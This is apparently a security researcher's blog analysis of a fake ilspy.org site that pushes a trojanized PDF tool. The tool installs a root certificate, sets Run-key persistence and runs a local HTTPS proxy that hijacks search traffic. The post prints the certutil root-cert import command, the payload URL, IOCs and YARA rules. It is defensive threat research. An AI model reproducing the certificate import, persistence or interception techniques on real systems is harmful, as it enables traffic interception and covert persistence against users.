# Fake ILSpy Site Delivers Search-Hijacking Malware ## Overview Someone registered **ilspy.org** (the real site is **ilspy.net**) and is using it to push malware at .NET developers and security researchers via a Traffic Distribution System (TDS). The network rotates payloads, so you might get a different app/browser extension. This post covers one downloaded payload: a trojanized PDF tool called PDF Lab that installs a local HTTPS interception proxy and silently hijacking search traffic across virtually every major search engine. ## Infection Chain ### Typosquat Landing Page The campaign starts at ilspy.org, a fake site impersonating the ILSpy project. It currently appears as the second search result for the keyword "ILSpy"

The real **ilspy.net** simply redirects to the project's GitHub page, ilspy.org instead hosts a standalone website pretending to be the official one. Any click anywhere on the page triggers a redirect, no specific button needs to be pressed. \ According to the Wayback Machine, the site was already active by December 9, 2025, giving this campaign at least a 4 month run at time of writing.

### Redirect via Traffic Distribution System The victim is redirected to an intermediate domain, which acts as a Traffic Distribution System (TDS). This gateway infrastructure has rotated across multiple domains over the campaign's lifetime, based on Wayback Machine snapshots of **ilspy.org**: | Domains | | ---------------------- | | oundhertobeconsist.org | | unpracticalwhich.org | | derwaistthatheha.org | | edshookherhead.org | | atytentioniaukmla.org | | bycathyhoughsheu.org | | sehinkitwkuou.org | | onalskillsexkce.org | All share the same pattern: a random-looking `.org` domain serving nothing but a JavaScript redirect. ```html ``` ### Malware Download The final payload is downloaded from: ``` https://blazingapss8.cfd/app/9/?clickid=8363797469683014935&filename= ``` The installer (App.exe) drops a bunch of files:

From all these files, there are two that we will take a look at: | File | Purpose | | ------------------ | ------------------------------------------ | | PDFLabApp.dll | Trojanized PDF tool | | PDFLabWatchdog.dll | Evidence cleanup / anti-forensics watchdog | ## Technical Analysis ### App.exe `App.exe` is an Inno Setup installer, beyond dropping the main components and all necessary libraries, it handles three things silently in the background while the victim sees a normal installation flow: * Installs **.NET Desktop Runtime 7.0.20** with `/quiet /norestart` * Imports `rootCert.pfx` into the Windows trusted root certificate store using `certutil.exe` * `certutil.exe" -f -p "" -importPFX Root "C:\Program Files (x86)\PDF Lab\rootCert.pfx` * Writes both Run keys for persistence * `HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PDFLabWatchdog` * `HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PDFLab`

### PDFLabApp.dll The malware installs a functional PDF utility called PDF Lab. The application presents a real UI with working features including Merge PDF, Split PDF, Compress PDF, and Protect PDF.

#### Remote Kill Switch and Telemetry The main entry point uses a named mutex (`GoogleSearchRedirect_SingleInstance`) to enforce a single running instance. More significantly, it implements a **run counter**: every 10th launch, it connects to a hardcoded SQL Server instance at `216.219.86.206` before allowing the application to proceed.

Two operations are run against this remote database: The first looks like a **kill switch check**. It queries the `AppRunState` table for a `KeepAppRunning` boolean. If this is set to false, the application exits immediately

The second is **telemetry.** It updates `AppInstances`, incrementing a `LifetimeInstanceCount` and recording the last `StartupTime`.

The database credentials are hardcoded in the binary in plaintext:

#### HTTPS Interception Proxy The most significant component is an HTTPS man-in-the-middle proxy built using the **Titanium.Web.Proxy** library, listening on **localhost:18234**. This is what performs the actual search hijacking.

With the root certificate already installed by the installer, the proxy can decrypt and manipulate HTTPS traffic without warnings. The malware changes Windows system proxy settings to route all browser traffic through it, saving the victim's original proxy configuration first for cleanup later.

#### Search Engine Coverage The proxy intercepts search queries across an exhaustive list of search engines, covering virtually every major platform and every regional Google TLD worldwide: * **Western engines:** Google (191 TLDs), Bing, Yahoo, DuckDuckGo, Brave, Startpage, Ecosia, AOL, Ask * **Eastern engines:** Yandex, Baidu, Naver, Sogou * **Plus all regional Google domains** from google.ad to google.co.zw Any search query matching these patterns is intercepted and redirected to `pdflab.gg/search`, which in turn forwards the victim to `doktox.com`, a search engine branded as "Blaze".

For example, a search for "ilspy decompiler" gets redirected to: `https://pdflab.gg/search?q=ilspy+decompiler` which then redirects the victim to `https://doktox.com/q/pdflab?q=ilspy+decompiler`

### PDFLabWatchdog.dll The watchdog process serves two purposes: **evidence cleanup** and **anti-forensics**. Sleeps for 120 seconds and then every 5 seconds it checks two conditions: 1. Is `PDFLabApp.exe` currently running? 2. Is the Windows proxy currently set to port 18234?

If PDFLabApp is **not** running but the malicious proxy is **still configured**, it restores the victim's original proxy settings from `HKCU\Software\GoogleSearchRedirect\OriginalProxy` and then **deletes the entire** `GoogleSearchRedirect` registry subtree.

#### Anti-Debug and Anti-Profiling Module * **Profiler detection:** If the `COR_ENABLE_PROFILING` environment variable equals `1` (set by .NET profiling tools), `Environment.FailFast()` is called immediately. * **Debugger watchdog:** A background thread polls `Debugger.IsAttached` and `Debugger.IsLogging()` in a loop. Either condition triggers an immediate hard crash. * **Mutual watchdog:** The main thread and the monitor thread watch each other. Killing the monitor thread causes the process to crash too, preventing simple thread termination as a bypass.

## PDB Path and GitHub Repository The binary contains an embedded PDB record that was not stripped before distribution, leaking both the developer's local path and a raw GitHub URL pointing to the source: ```json {"documents":{"D:\\Dev\\PDFLab\\PDFLabAppWithProxy\\*": "https://raw.githubusercontent.com/OmarNegm/PDFLabApp/9fa6add51f24128df6706dce5c426fbe1b7015f0/*"}} ``` ## IOCs | Network IOCs | | ------------------------ | | `ilspy.org` | | `oundhertobeconsist.org` | | `unpracticalwhich.org` | | `edshookherhead.org` | | `derwaistthatheha.org` | | `bycathyhoughsheu.org` | | `atytentioniaukmla.org` | | `sehinkitwkuou.org` | | `onalskillsexkce.org` | | `blazingapss8.cfd` | | `pdflab.gg` | | `doktox.com` | | `ghabovethec.info` | | `usoasopersbefore.org` | | `216.219.86.206` | | File IOCs | SHA-256 | | -------------------- | ------------------------------------------------------------------ | | `PDFLabApp.exe` | `059EFA4D73EC27AC904189FCE83C1CCF21F3CE565A5359D01C16C6E87E8D40A2` | | `PDFLabApp.dll` | `05E6BB6890E4FBE2EA0DF5653CF6CBD2AAEE46E9C3DC69A020FD445ACF650D46` | | `App.exe` | `5AE5235F7622A7B6E0E89DCE8B3C0A9A34DDB8C8C87306963FE4D4095F5D443C` | | `rootCert.pfx` | `6A6CB2ED1214D91216900E3A3C585D56065997FC56944E45A43ED6BAC51E3237` | | `PDFLabWatchdog.exe` | `A5C7333AFCC64C2D259C369407C0E33874FCB1989B99855BBD4CDC55EA6EAF8E` | | `PDFLabWatchdog.dll` | `86D10F7D2078C4E3DD3806E28537F1220F3E3F451322FB70EDEA3C760D2C78FE` | | `App.tmp` | `339CD77996AF82A614DA6C9441A17AC1A5FE3172E270AAA99C9AAE24716E3EAC` | | Registry IOCs | | ------------------------------------------------------------------- | | `HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PDFLab` | | `HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PDFLabWatchdog` | | `HKCU\Software\GoogleSearchRedirect` | | `HKCU\Software\GoogleSearchRedirect\OriginalProxy` | ### YARA Rules {% code overflow="wrap" %} ```json rule pdflabapp { meta: author = "miltinh0c" date = "2026-04-07" description = "Detects the HTTPS proxy search hijacker used in PDFLabApp." strings: $search_redirect_url = "pdflab.gg/search" ascii wide $root_cert_name = "Titanium Root Certificate Authority" ascii wide $library_titanium = "Titanium.Web.Proxy" ascii wide $reg_google_redirect_key = "Software\\GoogleSearchRedirect" ascii wide $reg_internet_settings = "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" ascii wide $zero_width_space = { E2 80 8B } $zero_width_nonjoiner = { E2 80 8C } condition: uint16(0) == 0x5A4D and $root_cert_name and $reg_google_redirect_key and $reg_internet_settings and $search_redirect_url and $library_titanium and 1 of ($zero_width_space, $zero_width_nonjoiner) } ``` {% endcode %} {% code overflow="wrap" %} ```json rule pdflabapp_watchdog { meta: author = "miltinh0c" date = "2026-04-07" description = "Detects the PDFLabWatchdog cleanup process." strings: $process = "PDFLabApp" ascii wide $reg_google_redirect_key = "Software\\GoogleSearchRedirect" ascii wide $reg_original = "Software\\GoogleSearchRedirect\\OriginalProxy" ascii wide $reg_internet_settings = "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" ascii wide $proxy_enable = "ProxyEnable" ascii wide $proxy_server = "ProxyServer" ascii wide $proxy_override = "ProxyOverride" ascii wide $import_winnet = "wininet.dll" ascii wide $internet_set_option = "InternetSetOption" ascii wide $zero_width_space = { E2 80 8B } $zero_width_nonjoiner = { E2 80 8C } condition: uint16(0) == 0x5A4D and $process and $reg_google_redirect_key and $reg_internet_settings and $import_winnet and $internet_set_option and 2 of ($proxy_enable, $proxy_server, $proxy_override, $reg_original) and 1 of ($zero_width_space, $zero_width_nonjoiner) } ``` {% endcode %}